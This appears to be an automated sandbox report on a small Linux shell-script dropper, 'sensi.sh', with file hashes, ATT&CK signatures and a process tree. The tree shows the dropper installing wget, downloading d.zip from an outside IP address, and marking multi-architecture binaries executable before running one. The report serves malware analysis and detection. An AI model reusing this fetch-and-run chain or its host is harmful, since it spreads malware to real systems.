58d5bc84e8dcfd88e55fb4408562e6e091a6fdc30698b94a91ce0c48fdce8770

Analysis

max time kernel
99s
max time network
104s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
26-12-2024 14:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sensi.sh
Size

616B
MD5

16a80dae144d0b28b41b1bc690560eb4
SHA1

f5656969be23544e08a5b6dc59444ad8d9f4075a
SHA256

58d5bc84e8dcfd88e55fb4408562e6e091a6fdc30698b94a91ce0c48fdce8770
SHA512

3e04f1b5d9aea830e52e9a619bfc4f5fffca455268b1379fd22ccd5ede4e8693510db2054f68fdf21cc8ab4c183db274a3ad87f54be84b42f32616aba6f55a96

Score

7^/10

credential_access defense_evasion discovery execution persistence upx

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
783	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/var/lib/dpkg/info/unzip.postinst	775	unzip.postinst

OS Credential Dumping 1 TTPs 1 IoCs

Adversaries may attempt to dump credentials to use it in password cracking.

credential_access

/etc/passwd and /etc/shadow

T1003.008

description	ioc	Process
File opened for reading	/etc/shadow	dpkg-preconfigure

Deletes log files 1 TTPs 1 IoCs

Deletes log files on the system.

defense_evasion

Clear Linux or Mac System Logs

T1070.002

description	ioc	Process
File deleted	/var/log/apt/eipp.log.xz	apt

Write file to user bin folder 4 IoCs

persistence

description	ioc	Process
File opened for modification	/usr/bin/funzip.dpkg-new	dpkg
File opened for modification	/usr/bin/unzip.dpkg-new	dpkg
File opened for modification	/usr/bin/unzipsfx.dpkg-new	dpkg
File opened for modification	/usr/bin/zipgrep.dpkg-new	dpkg

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/fstream-29.dat	upx

Reads runtime system information 11 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/self/fd	apt
File opened for reading	/proc/sys/kernel/ngroups_max	apt
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	tar
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg

System Network Configuration Discovery 1 TTPs 8 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
775	unzip.postinst
781	wget
782	unzip
704	apt
763	dpkg-split
763	dpkg-split
763	dpkg-split
763	dpkg-split

Writes file to tmp directory 20 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/d/xd.arm	unzip
File opened for modification	/tmp/fileutl.message.YEPXvl	apt
File opened for modification	/tmp/fileutl.message.tRRqwr	apt
File opened for modification	/tmp/d.zip	wget
File opened for modification	/tmp/d/xd.x86	unzip
File opened for modification	/tmp/fileutl.message.uiqHpW	apt
File opened for modification	/tmp/fileutl.message.lKRkDw	apt
File opened for modification	/tmp/d/xd.spc	unzip
File opened for modification	/tmp/d/xd.arm5	unzip
File opened for modification	/tmp/d/xd.ppc	unzip
File opened for modification	/tmp/fileutl.message.MJ5yMP	apt
File opened for modification	/tmp/fileutl.message.gJSbMi	apt
File opened for modification	/tmp/fileutl.message.ab0dd6	apt
File opened for modification	/tmp/d/xd.m68k	unzip
File opened for modification	/tmp/d/xd.mpsl	unzip
File opened for modification	/tmp/d/xd.sh4	unzip
File opened for modification	/tmp/fileutl.message.C3iNLt	apt
File opened for modification	/tmp/d/xd.arm6	unzip
File opened for modification	/tmp/d/xd.arm7	unzip
File opened for modification	/tmp/d/xd.mips	unzip

Software Deployment Tools 1 TTPs 2 IoCs

Use software deployment tools to execute code.

execution

Software Deployment Tools

T1072

pid	Process
763	dpkg-split
772	dpkg

/tmp/sensi.sh
/tmp/sensi.sh
1⤵
PID:697
- /usr/bin/apt
  apt install -y wget unzip
  2⤵
  - Deletes log files
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:704
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:709
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:723
- - /usr/lib/apt/methods/http
    /usr/lib/apt/methods/http
    3⤵
    PID:744
- - /usr/lib/apt/methods/http
    /usr/lib/apt/methods/http
    3⤵
    PID:745
- - /bin/sh
    /bin/sh -c "/usr/sbin/dpkg-preconfigure --apt || true"
    3⤵
    PID:746
  - - /usr/sbin/dpkg-preconfigure
      /usr/sbin/dpkg-preconfigure --apt
      4⤵
      OS Credential Dumping
      PID:747
    - - /usr/local/sbin/locale
        
        locale charmap
        5⤵
        
        PID:748
    - - /usr/local/bin/locale
        
        locale charmap
        5⤵
        
        PID:748
    - - /usr/sbin/locale
        
        locale charmap
        5⤵
        
        PID:748
    - - /usr/bin/locale
        
        locale charmap
        5⤵
        
        PID:748
    - - /bin/sh
        
        sh -c "stty -a 2>/dev/null"
        5⤵
        
        PID:749
      - /bin/stty
        
        stty -a
        6⤵
        
        PID:750
    - - /bin/sh
        
        sh -c "stty -a 2>/dev/null"
        5⤵
        
        PID:751
      - /bin/stty
        
        stty -a
        6⤵
        
        PID:752
    - - /bin/sh
        
        sh -c "stty -a 2>/dev/null"
        5⤵
        
        PID:753
      - /bin/stty
        
        stty -a
        6⤵
        
        PID:754
    - - /bin/sh
        
        sh -c "stty -a 2>/dev/null"
        5⤵
        
        PID:755
      - /bin/stty
        
        stty -a
        6⤵
        
        PID:756
    - - /bin/sh
        
        sh -c "stty -a 2>/dev/null"
        5⤵
        
        PID:757
      - /bin/stty
        
        stty -a
        6⤵
        
        PID:758
    - - /bin/sh
        
        sh -c "stty -a 2>/dev/null"
        5⤵
        
        PID:759
      - /bin/stty
        
        stty -a
        6⤵
        
        PID:760
- - /usr/bin/dpkg
    /usr/bin/dpkg --assert-multi-arch
    3⤵
    - Reads runtime system information
    PID:761
- - /usr/bin/dpkg
    /usr/bin/dpkg --status-fd 14 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/unzip_6.0-21+deb9u2_mipsel.deb
    3⤵
    - Write file to user bin folder
    - Reads runtime system information
    PID:762
  - - /usr/local/sbin/dpkg-split
      dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/unzip_6.0-21+deb9u2_mipsel.deb
      4⤵
      System Network Configuration Discovery
      PID:763
  - - /usr/local/bin/dpkg-split
      dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/unzip_6.0-21+deb9u2_mipsel.deb
      4⤵
      System Network Configuration Discovery
      PID:763
  - - /usr/sbin/dpkg-split
      dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/unzip_6.0-21+deb9u2_mipsel.deb
      4⤵
      System Network Configuration Discovery
      PID:763
  - - /usr/bin/dpkg-split
      dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/unzip_6.0-21+deb9u2_mipsel.deb
      4⤵
      System Network Configuration Discovery
      Software Deployment Tools
      PID:763
  - - /usr/local/sbin/dpkg-deb
      dpkg-deb --control /var/cache/apt/archives/unzip_6.0-21+deb9u2_mipsel.deb /var/lib/dpkg/tmp.ci
      4⤵
      PID:764
  - - /usr/local/bin/dpkg-deb
      dpkg-deb --control /var/cache/apt/archives/unzip_6.0-21+deb9u2_mipsel.deb /var/lib/dpkg/tmp.ci
      4⤵
      PID:764
  - - /usr/sbin/dpkg-deb
      dpkg-deb --control /var/cache/apt/archives/unzip_6.0-21+deb9u2_mipsel.deb /var/lib/dpkg/tmp.ci
      4⤵
      PID:764
  - - /usr/bin/dpkg-deb
      dpkg-deb --control /var/cache/apt/archives/unzip_6.0-21+deb9u2_mipsel.deb /var/lib/dpkg/tmp.ci
      4⤵
      PID:764
    - - /usr/local/sbin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:767
    - - /usr/local/bin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:767
    - - /usr/sbin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:767
    - - /usr/bin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:767
    - - /sbin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:767
    - - /bin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        Reads runtime system information
        
        PID:767
  - - /usr/local/sbin/dpkg-deb
      dpkg-deb --fsys-tarfile /var/cache/apt/archives/unzip_6.0-21+deb9u2_mipsel.deb
      4⤵
      PID:768
  - - /usr/local/bin/dpkg-deb
      dpkg-deb --fsys-tarfile /var/cache/apt/archives/unzip_6.0-21+deb9u2_mipsel.deb
      4⤵
      PID:768
  - - /usr/sbin/dpkg-deb
      dpkg-deb --fsys-tarfile /var/cache/apt/archives/unzip_6.0-21+deb9u2_mipsel.deb
      4⤵
      PID:768
  - - /usr/bin/dpkg-deb
      dpkg-deb --fsys-tarfile /var/cache/apt/archives/unzip_6.0-21+deb9u2_mipsel.deb
      4⤵
      PID:768
  - - /usr/local/sbin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:771
  - - /usr/local/bin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:771
  - - /usr/sbin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:771
  - - /usr/bin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:771
  - - /sbin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:771
  - - /bin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:771
- - /usr/bin/dpkg
    /usr/bin/dpkg --status-fd 14 --configure --pending
    3⤵
    - Reads runtime system information
    - Software Deployment Tools
    PID:772
  - - /var/lib/dpkg/info/mime-support.postinst
      /var/lib/dpkg/info/mime-support.postinst triggered /usr/lib/mime/packages
      4⤵
      PID:773
    - - /usr/sbin/update-mime
        
        /usr/sbin/update-mime --triggered
        5⤵
        
        PID:774
  - - /var/lib/dpkg/info/unzip.postinst
      /var/lib/dpkg/info/unzip.postinst configure
      4⤵
      Executes dropped EXE
      System Network Configuration Discovery
      PID:775
    - - /usr/bin/which
        
        which update-mime
        5⤵
        
        PID:776
    - - /usr/sbin/update-mime
        
        update-mime
        5⤵
        
        PID:777
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:778
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:779
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:780
- /usr/bin/wget
  wget http://107.150.62.186/d.zip
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:781
- /usr/bin/unzip
  unzip d.zip
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:782
- /bin/chmod
  chmod +x xd.arm xd.arm5 xd.arm6 xd.arm7 xd.m68k xd.mips xd.mpsl xd.ppc xd.sh4 xd.spc xd.x86
  2⤵
  - File and Directory Permissions Modification
  PID:783
- /tmp/d/xd.x86
  ./xd.x86
  2⤵
  PID:784

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Software Deployment Tools

T1072

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Indicator Removal

T1070

Clear Linux or Mac System Logs

T1070.002

Credential Access

OS Credential Dumping

T1003

/etc/passwd and /etc/shadow

T1003.008

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Software Deployment Tools

T1072

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/d.zip

Filesize
349KB

MD5
9df87e61955d14d79c4dc948cbdcfb4b

SHA1
c0447a1a37c7f8ce24e6fb9919221a4d89a0dc74

SHA256
5d45fb31f1e8db1be7decb957041eb0a12802ce9a95e7fcc19d1794cea1b8d0a

SHA512
f6c96d88f80961d9036fea24d5d765c14ec573ca946d19e255a66d13b803f3e3c96c956a7daf65ee04b48b0f302817c85aaa3e45fd8930dc7b163f6f070a3bda

Download Submit
/tmp/d/xd.arm6

Filesize
33KB

MD5
5e15e25f22fc8090e7b02fb87845ae61

SHA1
115eace8a1131084fc9303ad4da2ad1ed2366125

SHA256
202a3205d0b9965e89fd62467165b82fca3e1932eec1b85b10bf9e2959098b23

SHA512
b760c1b1e60df0f6898af8304f433c1e619adafbe74d88815b1bf1c6749f0fd3754ef01d48e28e06a04b84db1755d94ab3f8e4871b9a8b4688510c8df6a145ec

Download Submit
/var/cache/apt/archives/partial/unzip_6.0-21+deb9u2_mipsel.deb

Filesize
162KB

MD5
a436956bf597726c065e3c739bfa5363

SHA1
e9e027a2e582c2b701735ce9d85e7c57016d066f

SHA256
a05eb2ce206cc6a12b4b6aa0080b8e071fc9326fffcece2e624334ecc268c017

SHA512
2a7d4f747ce1fb016262eb7e9800d641ec2142e6f921eeab7e18d2c2444e01eb61d40d1f1935f5457749c3652015c316ae48452ebb16d780d28cdd5a5a14ea68

Download Submit
/var/lib/dpkg/status-new

Filesize
404KB

MD5
b06002a472f0faecdf5b69e197a89dce

SHA1
9c203847325f3e8e8c94a379012e1985f6e28355

SHA256
e146d542559b8c2b340773e24b20241fd7dd14a7554927869e1991b50f070767

SHA512
b03cfd1c3c97325616127cdc83e24e2dbab4c324d8a3d3a8e2f4c4ca5f39623e75530a7d601e942437bf180c957345198e52dedbd0fd7ab5a894f8d2fb91a953

Download Submit
/var/lib/dpkg/status-new

Filesize
404KB

MD5
de83ea1799538fdecdd4e55831d7b698

SHA1
2ed9ee65ffdf3a03a2817470193c91bad4eb4350

SHA256
02d59592f8ef10777e818894e65eb2d0d4a42ed132899f3bc1da67a766a7f6dc

SHA512
25516475c894988e96969611a25ca2e4315595c25ec90a7d8db3a89ba5958d734b5eaa8f340f618c9d549ceb3c16dab2016fbbb88c7a9a9159f36aaca2c0fcab

Download Submit
/var/lib/dpkg/tmp.ci/control

Filesize
597B

MD5
4bdc7e0adddc0e34c5fe01855b0c0924

SHA1
2997c3f9ea52090a6660a3dfe9e6338eb42fb977

SHA256
dcbdc143b6c25b26dda2c80294fed1630b0ec27b348ddb7de3d8623ad6bfcbd2

SHA512
35b0fd2474cb56b5dda9f7dd8a51439def353188dc179afb41ad2ce2dcfbc6200ea4ec1fce616816749e4641fde24fb15989cda4ad326bffb6a9380a6f789098

Download Submit
/var/lib/dpkg/tmp.ci/md5sums

Filesize
963B

MD5
0224d84de3c8e0ec22671163836e54d9

SHA1
004740db185a5612302139096c4410efe84533d3

SHA256
189928d56baa5a0fc2b9f8a8c0613b082c96d79c3bcd2fd72900160b155e3c04

SHA512
3465a3aa6650afbde87b57131c908049d60618e57b8276fd233ad01947349a7244543f78841c8bf13e89ad10b82efb727b47ae08b556d365ccddc9b524caae81

Download Submit
/var/lib/dpkg/tmp.ci/postinst

Filesize
111B

MD5
40f076ea46271a47ab5b6ae60f3be867

SHA1
cf28e1141f93864226311300d023c1b5b1d7af72

SHA256
6ecdb1415319c81c14a94114a279186a8054c221fe6c63b8a8a2ce38b8b39966

SHA512
5dbf0c2700b5cfe252452df348bc2be9999b007258cb805a46bc37848deefd2918aaf4dc96a3f5b6c01f08c05cff8dee61aa66d7b840d49ef52a1a2a08d220ed

Download Submit
/var/lib/dpkg/tmp.ci/postrm

Filesize
78B

MD5
ceeea1caaa2b0bec75134102648ef302

SHA1
2bee404eb1355636cf146c61c6587be9c3182dc2

SHA256
27793cfe5796bf9b694e2e2ce532d62917dcad70b64b8a160947f84fd279008a

SHA512
13817a4d31ef99fc3de31b4714782a4ffc1d4f21a603de8d39706c88a87bd75c9a808f5868846d80f0480860ee70171569637d1addb3f9a583c29048537273d9

Download Submit
/var/lib/dpkg/updates/tmp.i

Filesize
4KB

MD5
01488aa1c2ad2277811502126011ff47

SHA1
0481793510a41175b3a14f8788b2b995cc9388c5

SHA256
d95a4f69059fd1fee84c5e418501bfa754ef3dd0f74543fbc7fa8e25c921216f

SHA512
9348e46948d482d4d6d19c6fec091884daaaf61a4bed2b439765588f25759cf96ca0f001d87d3b5103708cdac83be48ff3602a8dc52d3dc7cdc4ff4afdbd1cc7

Download Submit
/var/lib/dpkg/updates/tmp.i

Filesize
4KB

MD5
e2606feb727f1ffaf6b59e58bc0662b0

SHA1
89de45b1b14b5000902988b21c225e63905b6ac7

SHA256
51ccfc92fd852322f9d64d967ca99c095324fdbb2a6d82356f3e1a118f524bf9

SHA512
438d8e5919838a3aff204eb28a02a6efa3e95745f892a9b921d9c3476f049cdda802c31d5b63f5c2c80f964115b34a49fdde2f243be3a11b3c2ad32ba623ed87

Download Submit
/var/lib/dpkg/updates/tmp.i

Filesize
4KB

MD5
df74aa3fa70bdf9bba8917fa0ababd10

SHA1
d4e9b0f855a07b6454bf32fc8052371e94553acc

SHA256
f49c20a4f7b9739a0d2106fdb5d0233067bffcbc87ebc8d1de3839afe8e8b87f

SHA512
e2bfa09d1a5d49aa3c55899d402bceb79def1091b628a65b3d04ffb0bf21d3cc10526e29fe5a598d10996f8a73753d4ae0dbf69d72e469a4ec854838de20d6cf

Download Submit
/var/lib/dpkg/updates/tmp.i

Filesize
4KB

MD5
edae9b7299f2afc09258160786a4dada

SHA1
dd7aa0c8aa29e937efd88b9eb39811e1460b62b9

SHA256
cf7d2275d2effcc231f426e078582b9665c4a2407e267c9e25546220308dd569

SHA512
0e3341d862dde54e87b2cea0384cc79a4594f7a22a322d501fbb386559511cc8e6046bf134bc1496d04bddb80c8213dd0438368d3a5d20b82099a5a4c9cc30ff

Download Submit
/var/lib/dpkg/updates/tmp.i

Filesize
4KB

MD5
3739a7d89cda39eacb39877c2316a2c4

SHA1
986be02e54e881027457dedbb235cece5afc5b67

SHA256
8fb323e057874f47ac405dc9c04f3998d6df87b24a69a51398c338918f38e647

SHA512
2758a82184a1f50273b44b220a7a4a3e54075d1706f37d6c15ca0ae063335262e3161e825c3b60a132eadd38daea512ba4aeb6d55d48826ef66c1d1a55241a06

Download Submit
/var/log/apt/eipp.log.xz

Filesize
18KB

MD5
f20542878eaacfce6eba92d8dbd9385f

SHA1
a6dde8de74723e62035fcb5ed99aa684f06a86da

SHA256
a7900e29f77ee05b3158facb879b85cf4029f47accf9a6dd1ea0d5c9eab4a879

SHA512
0628abae9d1f76a7061695cebad8f651cfec032da2ed8512c96ba123a183849c6aff25637b141c696b36ebab3eaf8b3654e079b390c91ad372d0f2e0ac2e7e2c

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads